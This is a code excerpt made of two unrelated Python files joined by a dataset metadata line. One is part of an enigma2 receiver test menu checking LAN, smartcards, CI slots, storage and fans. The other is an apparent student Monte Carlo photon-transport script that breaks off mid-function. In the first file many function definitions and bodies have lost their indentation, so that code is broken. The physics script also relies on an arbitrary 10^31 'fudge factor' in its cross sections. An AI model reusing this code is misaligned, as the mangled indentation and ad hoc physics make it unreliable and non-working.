self.changeMenuName("fan", "FAN - ON /[OFF]")
fancontrol.setPWM(0, 0)
# ---------------------------------------------------------------------
# deep standby
# ---------------------------------------------------------------------
	def deepStandby(self):
		"""Ask for confirmation before powering down to deep standby."""
		self.session.openWithCallback(self.deepStandbyConfirmed, MessageBox, _("Do you really want to go to Deep Standby?"), default = True)
def deepStandbyConfirmed(self, answer):
if answer:
self.quit(1)
# ---------------------------------------------------------------------
# lan check
# ---------------------------------------------------------------------
	def getLinkState(self):
		"""Ask iNetwork for the link state; the result arrives in dataAvail.

		NOTE(review): the broad except silently swallows every failure —
		boxes without the interface simply show no LAN information.
		"""
		try:
			iNetwork.getLinkState(self.iface, self.dataAvail)
		except:
			pass
	def dataAvail(self, data):
		"""Parse link-state output and react to the result.

		self.LinkState reflects the LAST 'Link detected:' line found in
		*data* (None if no such line).  On link-up the network state is
		queried; otherwise the LAN row shows N/A and the monitor timer is
		re-armed.
		"""
		self.LinkState = None
		for line in data.splitlines():
			line = line.strip()
			if 'Link detected:' in line:
				if "yes" in line:
					self.LinkState = True
				else:
					self.LinkState = False
		if self.LinkState == True:
			iNetwork.checkNetworkState(self.checkNetworkCB)
		else:
			self["lan_s"].setText(_(" N/A"))
			self["lan_s"].setForegroundColorNum(0)
			# poll again in 1s (single-shot timer)
			self.networkMonitor.start(1000, True)
	def checkNetworkCB(self,data):
		"""Show the interface IP when the adapter is up and reachable.

		*data* is the iNetwork state code; values <= 2 are treated as
		reachable.  An all-zero IP triggers a LAN restart and shows a
		"Getting..." placeholder.  NOTE(review): the broad except at the
		bottom silently hides any error raised in this callback — confirm
		this best-effort behaviour is intended.
		"""
		try:
			if iNetwork.getAdapterAttribute(self.iface, "up") is True:
				if self.LinkState is True:
					if data <= 2:
						ip = NoSave(ConfigIP(default=iNetwork.getAdapterAttribute(self.iface, "ip")) or [0,0,0,0]).getText()
						if ip == "0.0.0.0":
							# no lease yet: kick the interface and retry
							self.networkMonitor.stop()
							self.restartLan()
							self["lan_s"].setText(_(" Getting..."))
							self["lan_s"].setForegroundColorNum(0)
							return
						self["lan_s"].setText(_(" %s") % ip)
						self["lan_s"].setForegroundColorNum(1)
					else:
						self["lan_s"].setText(_(" N/A"))
						self["lan_s"].setForegroundColorNum(0)
				else:
					self["lan_s"].setText(_(" N/A"))
					self["lan_s"].setForegroundColorNum(0)
			else:
				self["lan_s"].setText(_(" N/A"))
				self["lan_s"].setForegroundColorNum(0)
			# re-arm the single-shot poll timer
			self.networkMonitor.start(1000, True)
		except:
			pass
	def restartLan(self):
		"""Restart the network stack; completion lands in restartLanDataAvail."""
		iNetwork.restartNetwork(self.restartLanDataAvail)
def restartLanDataAvail(self, data):
if data is True:
iNetwork.getInterfaces(self.getInterfacesDataAvail)
	def getInterfacesDataAvail(self, data):
		"""Callback after re-reading interfaces: restart the poll timer."""
		if data is True:
			self.networkMonitor.start(1000, True)
# ---------------------------------------------------------------------
# smartcard check
# ---------------------------------------------------------------------
def getSCInfo(self, slot = 0):
card = "N/A"
device = open("/dev/sci%d" % slot, "rw")
try:
fcntl.ioctl(device.fileno(), 0x80047301)
atr = device.read()
for atrHead in self.CARD_LIST.keys():
if atr.startswith(atrHead):
card = self.CARD_LIST[atrHead]
except:
card = "Unknown"
return card
	def checkSCSlot(self, slot = 0):
		"""Return non-zero when a smartcard is inserted in *slot*.

		When the slot device cannot be opened, softcam and cardserver are
		stopped (they may be holding the device) and False is returned.
		"""
		inserted = array.array('h', [0])
		try:
			device = open("/dev/sci%d" % slot, "rw")
		except:
			os.system("/etc/init.d/softcam stop; /etc/init.d/cardserver stop")
			return False
		# NOTE(review): 0x80047308 appears to be the card-detect ioctl;
		# the result is written into 'inserted' (mutable buffer)
		fcntl.ioctl(device.fileno(), 0x80047308, inserted, 1)
		device.close()
		return inserted[0]
def getSCState(self):
for slot in (0, 1):
if os.path.exists("/dev/sci%d" % slot):
if self.checkSCSlot():
if not self.smartcardInserted[slot]:
scInfo = self.getSCInfo(slot)
self["sc%d_s" % slot].setText(_(" %s" % scInfo))
if scInfo != "Unknown":
self["sc%d_s" % slot].setForegroundColorNum(1)
else:
self["sc%d_s" % slot].setForegroundColorNum(0)
self.smartcardInserted[slot] = True
else:
if self.smartcardInserted[slot]:
self["sc%d_s" % slot].setText(_(" N/A"))
self["sc%d_s" % slot].setForegroundColorNum(0)
self.smartcardInserted[slot] = False
else:
self["sc%d_i" % slot].hide()
self["sc%d_s" % slot].hide()
# ---------------------------------------------------------------------
# ci check
# ---------------------------------------------------------------------
	def getCIState(self):
		"""Poll both CI slots and update their status rows.

		CI state 1 shows "Getting...", state 2 (module ready) shows the
		module's application name; anything else shows N/A.  Slots whose
		device node does not exist are hidden.
		"""
		for slot in (0, 1):
			if os.path.exists("/dev/ci%d" % slot):
				state = eDVBCI_UI.getInstance().getState(slot)
				if state == 1:
					self["ci%d_s" % slot].setText(_(" Getting..."))
					self["ci%d_s" % slot].setForegroundColorNum(0)
				elif state == 2: #module ready
					self["ci%d_s" % slot].setText(_(" %s" % eDVBCI_UI.getInstance().getAppName(slot)))
					self["ci%d_s" % slot].setForegroundColorNum(1)
					# the MMI session is only needed to fetch the name
					eDVBCI_UI.getInstance().stopMMI(slot)
				else:
					self["ci%d_s" % slot].setText(_(" N/A"))
					self["ci%d_s" % slot].setForegroundColorNum(0)
			else:
				self["ci%d_i" % slot].hide()
				self["ci%d_s" % slot].hide()
# ---------------------------------------------------------------------
# usb, sata check
# ---------------------------------------------------------------------
	def getStorageState(self):
		"""Refresh the SATA/USB rows from the currently attached drives.

		Drives on the "Internal" bus count as SATA; USB drives are mapped
		to front/rear slots by matching their sysfs realpath against the
		per-model USBDB table.  Unmatched rows fall back to N/A.
		"""
		storageFound = {}
		try:
			for hd in harddiskmanager.HDDList():
				if "Internal" in hd[1].bus():
					storageFound["sata_s"] = hd[1].model()
				else:
					for realpath in self.USBDB[HardwareInfo().get_device_name()]:
						if realpath in os.path.realpath('/sys/block/' + hd[1].device[:3] + '/device')[4:]:
							storageFound["usb%d_s" % self.USBDB[HardwareInfo().get_device_name()][realpath]] = hd[1].model()
		except:
			# NOTE(review): broad except aborts the whole refresh silently
			return
		for storage in ("sata_s", "usb0_s", "usb1_s", "usb2_s"):
			if storageFound.has_key(storage):
				self[storage].setText(_(" %s" % storageFound[storage]))
				self[storage].setForegroundColorNum(1)
			else:
				self[storage].setText(_(" N/A"))
				self[storage].setForegroundColorNum(0)
# ---------------------------------------------------------------------
# mac address check
# ---------------------------------------------------------------------
def getMacaddress(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', self.iface[:15]))
return ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1]
# ---------------------------------------------------------------------
# micom version check
# ---------------------------------------------------------------------
def getMicomVersion(self):
if HardwareInfo().has_micom():
return about.getMicomVersionString()
else:
return "N/A"
# ---------------------------------------------------------------------
# security chip check
# ---------------------------------------------------------------------
def checkSecurityChip(self):
fp = open('/dev/dbox/fp0', 'w')
try:
return fcntl.ioctl(fp.fileno(), 0x417)
except:
return 0xf
# ---------------------------------------------------------------------
# fan status check
# ---------------------------------------------------------------------
	def initFanSensors(self):
		"""Create up to 8 temperature and 8 fan-RPM source widgets.

		Slots beyond the number of detected sensors get empty labels and
		sensor-less sources so the skin always finds all of its widgets.
		"""
		templist = sensors.getSensorsList(sensors.TYPE_TEMPERATURE)
		tempcount = len(templist)
		fanlist = sensors.getSensorsList(sensors.TYPE_FAN_RPM)
		fancount = len(fanlist)
		for count in range(8):
			if count < tempcount:
				id = templist[count]
				self["SensorTempText%d" % count] = StaticText(sensors.getSensorName(id))
				self["SensorTemp%d" % count] = SensorSource(sensorid = id)
			else:
				# placeholder for skins expecting a fixed widget count
				self["SensorTempText%d" % count] = StaticText("")
				self["SensorTemp%d" % count] = SensorSource()
			if count < fancount:
				id = fanlist[count]
				self["SensorFanText%d" % count] = StaticText(sensors.getSensorName(id))
				self["SensorFan%d" % count] = SensorSource(sensorid = id)
			else:
				self["SensorFanText%d" % count] = StaticText("")
				self["SensorFan%d" % count] = SensorSource()
|
pli3/enigma2-git
|
lib/python/Screens/TestMenu.py
|
Python
|
gpl-2.0
| 43,638
|
#!/usr/bin/python
# Creator: Daniel Wooten
# NE255 HW4 P3 MC Code
import logging as logging
import time as time
import sys as sys
import numpy as np
import math as math
import pylab as pl
import csv as csvreader
import mpmath as mp
# Set mpmath's working precision to 70 significant decimal digits.
# BUGFIX: mpmath's precision attribute is ``dps`` (decimal places);
# assigning ``mp.dis`` merely created an unused attribute and left the
# precision at the default 15 digits.
mp.dps = 70
# Function, refer to docstring for purpose
def cep():
    """Write a horizontal separator to the debug log (sub-step marker)."""
    logging.debug("*****************************************************")
    return ()
#Function, refer to docstring for purpose
def sep():
    """Write a function-boundary separator to the debug log."""
    logging.debug('//////////////////////////////////////////////////////')
    return ()
# Let the user know that the code is running
print "*****************************************************"
print "Photon CODE BEGIN!"
# Number of photon histories to run (interactive input)
N = int( raw_input('Please input the number of samples\n') )
# Read the tabulated photon cross sections: rows of (energy, xs, ...)
csvfile = open( 'raw_xs.txt' , 'r' )
reader = csvreader.reader( csvfile )
array = []
for row in reader:
	array.append( row )
# Convert the string CSV rows into a float numpy table
att_array = np.zeros( ( len( array ) , 3 ) )
for row in range( len( array ) ):
	for column in range( len( array[ row ] ) ):
		att_array[ row ][ column ] = float( array[ row ][ column ] )
# Number of spatial bins across the slab
h = 10
# Cell length: the slab is 5.0 units thick
cell_length = 5.0 / float( h )
# Per-cell tally arrays plus a 2-entry (left, right) leakage tally
collisions = np.zeros( h )
absorptions = np.zeros( h )
leak_array = np.zeros( 2 )
# File names for the log and output files respectively
LogFileName = 'logfile.dat'
OutputFile = 'output.dat'
# Log level 0 enables everything down to DEBUG
LogLevel = 0
# This does some basic config on the log file
logging.basicConfig( filename = LogFileName , format = \
	"[%(levelname)8s] %(message)s" , filemode =\
	'w' , level = LogLevel )
logging.debug( "This is the debug level reporting in" )
logging.info( "This is the info level reporting in " )
logging.warning( "This is the warning level reporting in" )
logging.error( "This is the error level reporting in" )
logging.critical( "This is the critical level reporting in" )
logging.debug( 'The number of samples being run is ' + str(N) )
# Dump the cross-section table when debug logging is enabled
if LogLevel <= 10:
	sep()
	logging.debug( 'The cross sections array is: ' )
	cep()
	for row in range( len( att_array ) ):
		logging.debug( str( att_array[ row ] ) )
#This function will follow the lifespan of one neutron
def Lifetime( col_counter , abs_counter , leak_counter , xs , \
	cell_width , start_pos , angle , \
	distance , leakage , collide , col_type , \
	location , new_angle , xs_data , cep , sep ):
	'''Follow one photon from birth to absorption or leakage.

	All physics routines (xs, start_pos, angle, distance, leakage,
	collide, ...) are injected as callables; the tally arrays are mutated
	in place.  Returns the energy-weighted albedo score for this history.
	NOTE(review): ``score`` is resolved from module scope, not from the
	argument list — keep it defined alongside this function.
	'''
	sep()
	logging.debug( 'Starting new neutron history' )
	# alive == False once the photon is absorbed
	alive = True
	cep()
	logging.debug( 'Neutron is alive: ' + str( alive ) )
	# inside == False once the photon leaks out of the slab
	inside = True
	cep()
	logging.debug( 'Neutron is inside: ' + str( inside ) )
	# Birth position, direction cosine and energy
	pos = start_pos( cep , sep )
	cep()
	logging.debug( 'Neutron is starting at: ' + str( pos ) )
	mu = angle( cep , sep )
	cep()
	logging.debug( 'Neutron has angle: ' + str( mu ) )
	eng = 2.0
	cep()
	logging.debug( 'Neutron has energy: ' + str( eng ) )
	# Collision counter for this history
	num_col = 0
	# Albedo accumulator returned to the caller
	count = 0
	# Track the photon until it is absorbed or leaks
	while ( inside and alive ):
		cep()
		logging.debug( 'Tracking collision number: ' + str( num_col ) )
		# Cross sections at the current energy
		xs_array = xs( xs_data , eng , cep , sep )
		# Sampled path length to the next collision
		dis = distance( xs_array[ 0 ] , cep , sep )
		cep()
		logging.debug( 'Neutron is traveling distance: ' + \
			str( dis ) )
		cep()
		logging.debug( 'Projected distance is: ' + str( dis * mu ) )
		# Project the flight onto the x axis
		old_pos = pos
		pos = pos + dis * mu
		cep()
		logging.debug( 'New position is: ' + str( pos ) )
		# Albedo is only scored on the flight after the first collision
		logging.debug( 'num_col is: ' + str( num_col ) )
		if num_col > 0 and num_col < 2:
			logging.debug( 'Tripped' )
			count = score( mu , pos , eng , \
				count, old_pos , cep , sep )
		# Leakage check (updates the leakage tally internally)
		cep()
		logging.debug( 'Checking for leakage' )
		inside = leakage( pos , leak_counter , inside , cep , sep )
		logging.debug( 'Neutron is inside: ' + str( inside ) )
		logging.debug( 'Neutron is alive: ' + str( alive ) )
		# Collide only when the photon is still alive and inside
		cep()
		logging.debug( 'Colliding neutron if alive:' )
		logging.debug( 'Parameters before collision: ' )
		logging.debug( 'Incoming angle is: ' + str( mu ) )
		logging.debug( 'Incoming energy is: ' + str( eng ) )
		if alive and inside:
			res = collide( pos , mu , col_counter, \
				abs_counter , \
				alive, angle , col_type , location , xs_array , cell_width\
				, new_angle , eng , cep , sep )
			alive = res[ 0 ]
			mu = res[ 1 ]
			eng = res[ 2 ]
			cep()
			logging.debug( 'Neutron parameters post collision: ' )
			logging.debug( 'Outgoing angle is: ' + str( mu ) )
		cep()
		logging.debug( 'Neutron is alive: ' + str( alive ) )
		logging.debug( 'Neutron is inside: ' + str( inside ) )
		# Next collision
		num_col += 1
		logging.debug( str( num_col ) )
	cep()
	logging.debug( 'Albedo for this photon is: ' + str( count ) )
	logging.debug( 'Terminating neutron history' )
	sep()
	return( count )
#This function will score our albedo
def score(angle, place, energy, alb, old_place, cep, sep):
    """Score the energy-weighted albedo contribution for one flight.

    A photon flying backwards (angle < 0) whose new position has passed
    |old_place / angle| contributes energy * |angle|; otherwise 0.
    """
    sep()
    logging.debug('Entering the score function')
    contribution = 0
    cep()
    logging.debug('Angle has value: ' + str(angle))
    logging.debug('Place has value: ' + str(place))
    logging.debug('P > ' + str(old_place / angle))
    if angle < 0.0 and place >= abs(old_place / angle):
        contribution = energy * abs(angle)
    cep()
    logging.debug('mark has value: ' + str(contribution))
    cep()
    logging.debug('Leaving the score function')
    sep()
    return contribution
#This function will determine photon cross sections
def xs( data , energy , cep , sep ):
	'''Return [total, Compton, remainder] macroscopic cross sections.

	The Compton part comes from the Klein-Nishina total cross section
	(with the author's fudge factor f); the total cross section is
	linearly interpolated in energy from the tabulated (energy, xs)
	pairs in *data* and scaled by the density rho; index 2 is
	total - Compton.

	BUGFIX: the below-table branch was missing the '/' in its slope
	(which "called" a float and raised TypeError) and applied the slope
	with inverted signs; the in-table branch used dE/dsigma instead of
	dsigma/dE.  Both branches now do standard linear interpolation
	sigma(E) = sigma_i - slope * (E_i - E).
	'''
	sep()
	logging.debug( 'Entering the xs function' )
	#Storage: [total, compton, remainder]
	cs_array = np.zeros( 3 )
	#Concrete density
	rho = 2.3
	#Rough electron density
	e_den = mp.mpf( 3 * 10**( 23 ) * 100**3 )
	#Planck's constant, electron charge, speed of light, electron mass
	plank = mp.mpf( 6.626 * 10**( -34 ) )
	qo = mp.mpf( 1.602 * 10**( -19 ) )
	light = mp.mpf( 3.0 * 10**( 8 ) )
	mass = mp.mpf( 9.109 * 10**( -31 ) )
	#Energy as an extended-precision number
	eng = mp.mpmathify( energy )
	eng = eng * 10**( -13 )
	#Photon frequency (kept for reference; unused below)
	v = eng / plank
	#Fudge factor to bring the Compton xs near a realistic magnitude
	f = 10**(31)
	#Klein-Nishina total cross section
	radius = qo**4 / ( mass * light**2 )
	alpha = ( eng ) / ( mass * light**2 )
	cs_xs = 2 * mp.pi * radius * ( ( ( 1.0 + alpha ) \
		/ ( alpha**2 ) ) * ( ( ( 2.0 * ( 1.0 + alpha ) \
		) / ( 1.0 + 2.0 * alpha ) ) - ( 1.0 / alpha ) * \
		( mp.log( 1.0 + 2.0 * alpha ) ) ) + ( ( 1.0 / \
		( 2.0 * alpha ) ) * mp.log( 1.0 + 2.0 * alpha ) - \
		( ( 1.0 + 3.0 * alpha ) / ( 1.0 + 2.0 * alpha )**2 ) ) )
	cep()
	logging.debug( 'The micro cs xs is: ' + mp.nstr( \
		cs_xs , n = 10 ) )
	mu_cs = cs_xs * e_den * f
	logging.debug( 'The macro cs xs is: ' + mp.nstr( \
		mu_cs , n = 10 ) )
	cs_array[ 1 ] = float( mp.nstr( mu_cs , n = 10 ) )
	#Linear interpolation of the total xs from the table
	cep()
	logging.debug( 'Energy of photon is: ' + str( energy ) )
	if energy <= data[ 0 , 0 ]:
		logging.debug( 'Lowest energy point is: ' + \
			str( data[ 0 , 0 ] ) )
		logging.debug( 'Xs at lowest energy is: ' + \
			str( data[ 0 , 1 ] ) )
		#Extrapolate below the table with the first segment's slope
		slope = ( data[ 1 , 1 ] - data[ 0 , 1 ] ) / \
			( data[ 1 , 0 ] - data[ 0 , 0 ] )
		cs_array[ 0 ] = data[ 0 , 1 ] - slope * ( data[ 0 , 0 ] - energy )
		logging.debug( 'Calculated XS is: ' + \
			str( cs_array[ 0 ] ) )
	else:
		for row in range( len( data ) - 1 ):
			index = row + 1
			if energy <= data[ index , 0 ]:
				logging.debug( 'Energy of photon is: ' \
					+ str( energy ) )
				logging.debug( 'Energy of lower XS is: ' \
					+ str( data[ index - 1 , 0 ] ) )
				logging.debug( 'Energy of higher XS is: ' \
					+ str( data[ index , 0 ] ) )
				logging.debug( 'Lower XS is: ' + \
					str( data[ index - 1 , 1 ] ) )
				logging.debug( 'Higher XS is: ' + \
					str( data[ index , 1 ] ) )
				#Interpolate: sigma_i - slope * (E_i - E)
				slope = ( data[ index , 1 ] - data[ index - 1 , 1 ] ) / \
					( data[ index , 0 ] - data[ index - 1 , 0 ] )
				cs_array[ 0 ] = data[ index , 1 ] - \
					slope * ( data[ index , 0 ] - energy )
				logging.debug( 'Calculated XS is: ' + \
					str( cs_array[ 0 ] ) )
				break
	#Scale the tabulated (per-mass) xs by the density
	cs_array[ 0 ] = cs_array[ 0 ] * rho
	cs_array[ 2 ] = cs_array[ 0 ] - cs_array[ 1 ]
	cep()
	logging.debug( 'The cs_array is: ' + str( cs_array ) )
	logging.debug( 'Leaving the xs function' )
	sep()
	return( cs_array )
#This function will handle colliding neutrons
def collide( position , MU , col , absor , existance , angle \
	, col_type , location , cs , width , new_angle \
	, energy , cep , sep ):
	'''Process one collision and return [alive, new angle, new energy].

	Scatters call the module-level ``compton`` sampler for the outgoing
	angle and energy and bump the per-cell collision tally *col*;
	absorptions bump the absorption tally *absor* and kill the photon.
	NOTE(review): the *angle* and *new_angle* parameters are accepted but
	never used here.
	'''
	sep()
	logging.debug( 'Entering the colision routine' )
	# [alive, outgoing angle, outgoing energy]
	holder = [ True , MU , energy ]
	# 0 = absorption, >0 = scatter (sampled from the cross sections)
	collision = col_type( cs , cep , sep )
	cep()
	logging.debug( 'Collision of type: ' + str( collision ) )
	# Spatial cell index of the collision site
	spatial_bin = location( position , width , cep , sep )
	cep()
	logging.debug( 'Spatial bin of: ' + str( spatial_bin ) )
	if collision > 0:
		cep()
		logging.debug( 'Collision was a scatter' )
		#Tally the scatter in its cell
		cep()
		logging.debug( 'Collision count before tabulation: ' )
		logging.debug( 'Spatial bin: ' + str( spatial_bin ) \
			+ ' has ' + str( col[ spatial_bin ] ) )
		col[ spatial_bin ] += 1
		logging.debug( 'Collision count in bin ' + \
			str( spatial_bin ) + ' now: ' + \
			str( col[ spatial_bin ] ) )
		#Sample the outgoing angle and energy
		cep()
		logging.debug( 'Incoming angle: ' + str( MU ) )
		logging.debug( 'Incoming energy is: ' +str( energy ) )
		out = compton( MU , energy , cep , sep )
		MU = out[ 0 ]
		holder[ 1 ] = MU
		energy = out[ 1 ]
		holder[ 2 ] = energy
		cep()
		logging.debug( 'Outgoing angle: ' + str( MU ) )
		logging.debug( 'Outgoing energy is: ' + str( energy ) )
	else:
		#Tally the absorption in its cell
		cep()
		logging.debug( 'Collision was an absorption' )
		logging.debug( 'Abs count in bin ' + str( spatial_bin ) \
			+ ' is: ' + str( absor[ spatial_bin ] ) )
		absor[ spatial_bin ] += 1
		logging.debug( 'Count is now: ' + str( absor[ spatial_bin ] ) )
		#Absorption kills the photon
		holder[ 0 ] = False
	cep()
	logging.debug( 'Neutron is now alive: ' + str( existance ) )
	logging.debug( 'Leaving the collision function' )
	sep()
	return( holder )
#This function calculates an outgoing angle post scattering
def new_angle(incoming, x_sec, energy, cep, sep):
    """Sample an outgoing direction cosine after a scattering event.

    NOTE(review): mu_bar is taken as x_sec[2] / x_sec[1]; whether that
    ratio really is the mean scattering cosine depends on the caller's
    cross-section layout — confirm before reuse.
    """
    sep()
    logging.debug('Entering the new_angle function')
    mu_bar = x_sec[2] / x_sec[1]
    eta = np.random.random(1)  # single uniform deviate, as before
    radicand = 1 - 3 * incoming * mu_bar * (2 * (1 - 2 * eta) - 3 * incoming * mu_bar)
    outgoing = -1 + math.sqrt(radicand) / (3 * incoming * mu_bar)
    cep()
    logging.debug('Outgoing angle is: ' + str(outgoing))
    logging.debug('Leaving the new_angle function')
    sep()
    return outgoing
#This function will sample the photon energy in compton scattering
def compton(old_angle, energy, cep, sep):
    """Sample the post-Compton photon energy and direction cosine.

    Rejection sampling on the wavelength ratio x = lambda'/lambda;
    returns a 2-array: [new direction cosine, new energy].
    """
    sep()
    logging.debug('Entering the compton function')
    result = np.zeros(2)
    # incoming wavelength in Compton units (0.511 = m_e c^2 in MeV)
    lam = 0.511 / energy
    logging.debug('Lambda is: ' + str(lam))
    ratio = None
    # rejection loop: keep drawing triples until an energy is accepted
    while result[1] == 0:
        r1, r2, r3 = np.random.random(3)
        if r1 <= (lam + 2.0) / (9.0 * lam + 2.0):
            ratio = 1.0 + 2.0 * r2 / lam
            if r3 <= 4.0 * (1.0 / ratio - 1.0 / ratio ** 2):
                result[1] = 0.511 / (ratio * lam)
        else:
            ratio = (lam + 2.0) / (lam + 2.0 * r2)
            if r3 <= 0.5 * ((lam - lam * ratio + 1.0) ** 2 + 1.0 / ratio):
                result[1] = 0.511 / (ratio * lam)
    cep()
    logging.debug('Old energy: ' + str(energy))
    logging.debug('New energy: ' + str(result[1]))
    # rotate the direction by the sampled scattering angle
    result[0] = math.cos(math.acos(old_angle) + math.acos(1.0 - lam * (ratio - 1.0)))
    logging.debug('Old angle: ' + str(old_angle))
    logging.debug('New angle: ' + str(result[0]))
    logging.debug('Leaving the compton function')
    sep()
    return result
#This function determines in which spatial bin an interaction occurs
def location(place, bin_width, cep, sep):
    """Return the index of the spatial cell containing position *place*."""
    sep()
    logging.debug('Entering the location function')
    cell_index = int(math.floor(place / float(bin_width)))
    logging.debug('Cell is: ' + str(cell_index))
    logging.debug('Leaving the location function')
    sep()
    return cell_index
#This function will determine if the neutron leaked
def leakage(location, leak_array, present, cep, sep):
    """Check whether a photon has escaped the [0, 5] slab.

    Tallies right leakage (index 1) for location > 5.0 and left leakage
    (index 0) for location < 0.0; returns the updated "inside" flag.
    """
    sep()
    logging.debug('Entering the leakage function ')
    logging.debug('Location is: ' + str(location))
    logging.debug('Left leakage is: ' + str(leak_array[0]))
    logging.debug('Right leakage is: ' + str(leak_array[1]))
    if location > 5.0:
        present = False
        leak_array[1] += 1
    if location < 0.0:
        present = False
        leak_array[0] += 1
    cep()
    logging.debug('Neutron is inside: ' + str(present))
    logging.debug('Left leakage is: ' + str(leak_array[0]))
    logging.debug('Right leakage is: ' + str(leak_array[1]))
    logging.debug('Leaving the leakage function')
    sep()
    return present
#This function determines the collision type
def col_type(csx_array, cep, sep):
    """Sample the interaction type: 0 = absorption, 1 = scatter.

    Absorption is chosen when a uniform deviate falls at or below
    csx_array[2] / csx_array[0] (the absorption fraction of the total).
    """
    sep()
    logging.debug('Entering the col_type function')
    quanta = np.random.random(1)
    cep()
    logging.debug('Collision random is: ' + str(quanta))
    logging.debug('Threshold for abs is: ' + \
        str(csx_array[2] / csx_array[0]))
    cep()
    # 0 = absorption, 1 = scatter (local renamed: the original shadowed
    # the function's own name here)
    kind = 0 if quanta <= csx_array[2] / csx_array[0] else 1
    logging.debug('Collision type is: ' + str(kind))
    logging.debug('Leaving the col_type function')
    sep()
    return kind
#This function generates a start position for our neutron
def start_pos(cep, sep):
    """Return the photon birth position: a beam entering at x = 0.0."""
    sep()
    logging.debug('Entering the start_pos function')
    origin = 0.0
    cep()
    logging.debug('The starting position is ' + str(origin))
    logging.debug('Leaving the start_pos function')
    sep()
    return origin
#This function generates a random angle on (-1,1)
def angle(cep, sep):
    """Return the birth direction cosine: always 1.0 (normal incidence)."""
    sep()
    logging.debug('Entering the angle function')
    direction = 1.0
    logging.debug('Leaving the angle function')
    sep()
    return direction
#This function will give us the distance our neutron travels
def distance(xs, cep, sep):
    """Sample the flight distance to the next collision (exponential
    with mean 1/xs)."""
    sep()
    logging.debug('Entering the distance function')
    flight = -np.log(np.random.random(1)) / xs
    logging.debug('The calculated distance is ' + str(flight))
    logging.debug('Leaving the distance function')
    sep()
    return flight
#This function will calculate the flux distribution based
# on the collision flux estimator
def flux_collision( col_array , abs_array , num_part , cell_width, \
        num_bins , xs_array, cep , sep ):
    '''Calculate the collision-estimated scalar flux and its error.

    col_array  -- per-bin scatter (collision) tallies
    abs_array  -- per-bin absorption tallies
    num_part   -- total number of source particles
    cell_width -- width of one tally bin (cm)
    num_bins   -- number of tally bins
    xs_array   -- cross sections; [0] is the total cross section
    cep, sep   -- logging separator callbacks
    Returns a 2 x num_bins array: row 0 is the normalized flux and
    row 1 its standard error. (Despite the original description, no
    CSV files are written here.)
    '''
    sep()
    logging.debug( 'Entering the flux_collision function' )
    #Total interactions per bin = scatters + absorptions
    cep()
    logging.debug( 'Interactions array: ' )
    interactions = col_array + abs_array
    logging.debug( str( interactions ) )
    #Initialize the phi array
    phi = np.zeros( ( 2 , num_bins ) )
    #Collision flux estimator: interactions / (sig_t * volume * N)
    cep()
    logging.debug( 'First phi array: ' )
    phi[ 0 ] = ( interactions ) / ( xs_array[ 0 ] * \
        float( cell_width ) * float( num_part ) )
    logging.debug( str( phi[ 0 ] ) )
    #Store non-normalized flux.  BUG FIX: phi[ 0 ] alone is a numpy
    # view, so the normalization below silently overwrote nn_phi;
    # copy() preserves the true non-normalized values used in the
    # error propagation further down.
    nn_phi = phi[ 0 ].copy()
    #Normalize collision flux
    cep()
    logging.debug( 'Normalized phi array' )
    phi[ 0 ] = phi[ 0 ] / sum( phi[ 0 ] )
    logging.debug( str( phi[ 0 ] ) )
    #Calculate estimated mean
    cep()
    logging.debug( 'est mean array: ' )
    est_mean = ( interactions ) / float( num_part )
    logging.debug( str( est_mean ) )
    #We pull sig_t out of the array (causing problems with np)
    Tsig = xs_array[ 0 ]
    cep()
    logging.debug( 'Tsig: ' + str( Tsig ) )
    #Per-bin standard error of the non-normalized flux
    phi[ 1 ] = np.sqrt( ( np.square( interactions - est_mean ) ) / \
        ( float( num_part - 1 ) * float( num_part ) \
        * ( float ( Tsig ) * float( cell_width ) * float( num_part ) ) ) )
    cep()
    logging.debug( str( ( float( num_part - 1 ) * float( num_part ) \
        * ( float ( Tsig ) * float( cell_width ) * float( num_part ) ) ) ) )
    logging.debug( 'First phi error array: ' )
    logging.debug( str( phi[ 1 ] ) )
    #Error associated with the sum of the nn_phi array
    sum_error = math.sqrt( sum( np.square( phi[ 1 ] ) ) )
    #Propagate both the per-bin error and the error of the
    # normalizing sum into the normalized flux error
    phi[ 1 ] = np.sqrt( ( np.square( phi[ 1 ] ) / np.square( sum( nn_phi ) ) ) \
        + ( np.square( nn_phi ) / ( sum( nn_phi )**2 ) ) * \
        sum_error**2 )
    cep()
    logging.debug( 'Normalized phi error array: ' )
    logging.debug( str( phi[ 1 ] ) )
    cep()
    logging.debug( 'Leaving the flux_collision function' )
    sep()
    return( phi )
#This function will calculate the abs rate in slab halves
def abs_half_cells( abs_array , num_part , cep , sep ):
    '''Calculate absorption rates, probabilities, and their errors for
    the left and right halves of the slab.

    abs_array -- per-cell absorption tallies (numpy array)
    num_part  -- total number of source particles
    cep, sep  -- logging separator callbacks (cep is unused here)
    Returns a 4 x 2 array: row 0 = half-cell absorption rates,
    row 1 = rate standard errors, row 2 = absorption probabilities,
    row 3 = probability standard errors.  Column 0 is the left half
    of the slab, column 1 the right half.
    '''
    sep()
    logging.debug( 'Entering the abs_half_cell function' )
    #Index of the rightmost cell of the left half (inclusive).
    # Floor division keeps this an int under Python 3 as well.
    h_index = len( abs_array ) // 2 - 1
    logging.debug( 'Index of right end of left cell:' \
            + str( h_index ) )
    #Initialize the report array
    abs_report = np.zeros( ( 4 , 2 ) )
    #Get total absorptions
    total_abs = float( sum( abs_array ) )
    #Get abs, per cell, estimated mean
    abs_m = abs_array / float( num_part )
    #Get abs variance
    #NOTE(review): sample-variance denominators are usually N-1 (as
    # used in the currents function); confirm the N+1 here is intended.
    abs_v = ( abs_array - abs_m )**2 / ( \
            float( num_part + 1 ) * float( num_part ) )
    #Get abs s.error
    abs_e = np.sqrt( abs_v )
    #Error of left half sum.  BUG FIX: slice end is exclusive, so the
    # original [ 0 : h_index ] dropped cell h_index from both halves.
    abs_e_l = math.sqrt( sum( abs_v[ 0 : h_index + 1 ] ) )
    #Get error of right half sum
    abs_e_r = math.sqrt( sum( abs_v[ h_index + 1 : ] ) )
    #Get error of total sum
    abs_s_e = math.sqrt( sum( abs_v ) )
    #Get abs rate in left half (now includes cell h_index)
    abs_report[ 0 , 0 ] = sum( abs_array[ 0 : h_index + 1 ] )
    #Get abs rate in right half.  BUG FIX: the original called
    # sum( abs_array , h_index + 1 ), which sums the WHOLE array and
    # adds h_index + 1 through sum()'s start argument instead of
    # summing the right-half slice.
    abs_report[ 0 , 1 ] = sum( abs_array[ h_index + 1 : ] )
